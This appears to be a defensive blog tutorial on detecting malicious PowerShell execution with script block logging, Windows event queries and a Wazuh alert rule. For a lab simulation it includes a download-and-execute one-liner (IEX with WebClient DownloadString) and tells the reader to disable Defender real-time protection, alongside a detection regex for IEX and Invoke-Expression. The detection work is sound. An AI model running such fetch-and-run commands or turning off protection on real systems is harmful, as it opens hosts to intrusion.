
Detecting Malicious Script Execution in PowerShell

PowerShell, a powerful Windows command-line shell and scripting language, is frequently abused by adversaries to run malicious scripts and commands; according to Red Canary it is one of the most commonly observed techniques.

We will explore how attackers leverage PowerShell's capabilities to carry out their intrusions, such as those seen in the recent REF4578 intrusions revealed by Elastic Security Labs and Antiy.

[image: source @elasticseclabs]

Execution in PowerShell

T1059.001: PowerShell. This technique is post-exploitation: the attacker already has access to a machine and uses PowerShell to execute their scripts, as in the GhostEngine mining attacks.

[image: Source: Elastic Security Labs. Download and execute a PowerShell script]

Collection

Enabling PowerShell logging is crucial for effective detection of malicious activities. By default, Windows has PowerShell logging disabled, which can hinder our ability to monitor and respond to threats. By configuring detailed logging, we can capture information about every script block and command executed in PowerShell.

  • Open PowerShell as Administrator and run the following commands:

    ```powershell
    # Create the ScriptBlockLogging policy key if it does not exist yet,
    # then enable script block logging (events land in the
    # Microsoft-Windows-PowerShell/Operational log as event ID 4104)
    $basePath = "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
    if (-not (Test-Path $basePath)) { $null = New-Item $basePath -Force }
    Set-ItemProperty $basePath -Name EnableScriptBlockLogging -Value "1"
    ```

Simulation

For the simulation we will run a command line from Cmd and observe how it is logged and detected on the lab host. To make sure the commands execute without interference, Windows Defender's real-time protection is temporarily disabled for the test. This helps us understand the logging process and identify key indicators of potentially malicious activity.

```powershell
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/lr2t9iz/PowershellScriptsHub/main/hello_world.ps1');"
```

  • [image: output]

Result

To look for the malicious script execution, we query the event log with the following PowerShell command.

```powershell
# Pull script block logging events (ID 4104) and keep only the ones
# whose XML payload mentions the downloaded script name
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" `
-FilterXPath '*[System[EventID=4104]]' | Sort-Object -Property TimeCreated `
| Where-Object {$_.ToXml().Contains("hello_world")} | fl
```

  • [image: result]

Detection

To perform the detection we need a SIEM ready. If you don't have one yet, you can set it up by following these steps: Wazuh SIEM.

Search for the event in the SIEM

  • Wazuh > Modules > Security events
  • Put the following query in the search bar and click on Update:

    ```
    data.win.system.channel:"Microsoft-Windows-PowerShell/Operational" AND data.win.system.message:*hello_world*
    ```

  • [image: query result]
  • To see the content of the script, click on the + sign of the processID.

  • To receive an alert we will modify the rule with id 91837.

```xml
<!-- aaa_w1n_overwrite.xml rule file -->
<!-- Overrides the stock rule 91837 so it belongs to the "al3rt" group,
     which is used to route matching events to the Slack integration -->
<group name="al3rt,">
  <rule id="91837" level="4" overwrite="yes">
    <if_sid>91802</if_sid>
    <!-- Case-insensitive match on the logged script block text: alternate data stream
         reads, the IEX alias, or Invoke-Expression (spelled in full so it actually matches) -->
    <field name="win.eventdata.scriptBlockText" type="pcre2">(?i)(Get-Content.+\-Stream|IEX|Invoke-Expression)</field>
    <group>windows,powershell,</group>
    <description>Powershell executed "Get-Content -Stream or Invoke-Expression". Possible string execution as code</description>
    <options>no_full_log</options>
    <mitre> <id>T1059.001</id> </mitre>
  </rule>
</group>
```
  • The rule is located in the following repository.
  • As a result, we will receive a Slack alert for the PowerShell execution. [image: Slack alert]
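To check what the rule's regex fires on before deploying it, here is an added Python example (not code from this post or from Wazuh) that applies the same pattern, with Invoke-Expression spelled in full, to constructed events shaped like Wazuh's decoded win.eventdata.scriptBlockText field. The event ids, texts and the example.invalid URL are made up for the demonstration.

```python
import re

# Pattern from the page's Wazuh rule 91837; pcre2's (?i) prefix maps to re.IGNORECASE
RULE_91837_PATTERN = re.compile(r"(Get-Content.+\-Stream|IEX|Invoke-Expression)", re.IGNORECASE)


def script_block_hit(script_block_text):
    """Return the fragment the rule's regex matched, or None if the rule would not fire."""
    m = RULE_91837_PATTERN.search(script_block_text)
    return m.group(1) if m else None


def triage_events(events):
    """Apply the rule to decoded events and return (event id, matched fragment)
    for every 4104 script block event whose scriptBlockText trips the regex."""
    hits = []
    for ev in events:
        if ev["win"]["system"]["eventID"] != "4104":
            continue  # only script block logging events carry scriptBlockText
        hit = script_block_hit(ev["win"]["eventdata"].get("scriptBlockText", ""))
        if hit:
            hits.append((ev["id"], hit))
    return hits


# Constructed sample events (not real captures), mirroring the data.win.* fields
# that the rule's <field name="win.eventdata.scriptBlockText"> inspects
SAMPLE_EVENTS = [
    {"id": 1, "win": {"system": {"eventID": "4104"}, "eventdata": {"scriptBlockText":
        "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/hello_world.ps1');"}}},
    {"id": 2, "win": {"system": {"eventID": "4104"}, "eventdata": {"scriptBlockText":
        "invoke-expression (Get-Content .\\notes.txt)"}}},  # lower case still matches
    {"id": 3, "win": {"system": {"eventID": "4104"}, "eventdata": {"scriptBlockText":
        "Get-Content C:\\Users\\Public\\readme.txt -Stream Zone.Identifier"}}},
    {"id": 4, "win": {"system": {"eventID": "4104"}, "eventdata": {"scriptBlockText":
        "Write-Host 'hello world'"}}},  # benign, no alternative matches
    {"id": 5, "win": {"system": {"eventID": "4103"}, "eventdata": {"scriptBlockText":
        "IEX 'not a script block event'"}}},  # wrong event ID, skipped
]

if __name__ == "__main__":
    for event_id, fragment in triage_events(SAMPLE_EVENTS):
        print(f"event {event_id}: rule 91837 would fire on '{fragment}'")
```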
This post is licensed under CC BY 4.0 by the author.